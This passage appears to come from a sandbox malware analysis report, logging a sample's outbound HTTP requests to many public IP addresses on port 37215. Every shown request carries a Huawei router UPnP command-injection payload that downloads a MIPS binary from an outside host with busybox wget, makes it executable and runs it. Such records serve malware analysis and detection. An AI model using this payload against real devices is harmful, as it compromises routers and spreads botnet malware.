                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  529192.168.2.1352858197.252.246.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316356897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  530192.168.2.1344040157.164.169.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316382885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  531192.168.2.1360234197.138.44.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316401958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  532192.168.2.134548041.40.100.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316417933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  533192.168.2.1355046197.174.7.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316536903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  534192.168.2.134618041.254.204.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316565037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  535192.168.2.1354422157.71.110.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.316586971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  536192.168.2.1351162157.4.150.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320396900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  537192.168.2.1359554157.236.67.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320415974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  538192.168.2.1337688157.163.156.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320449114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 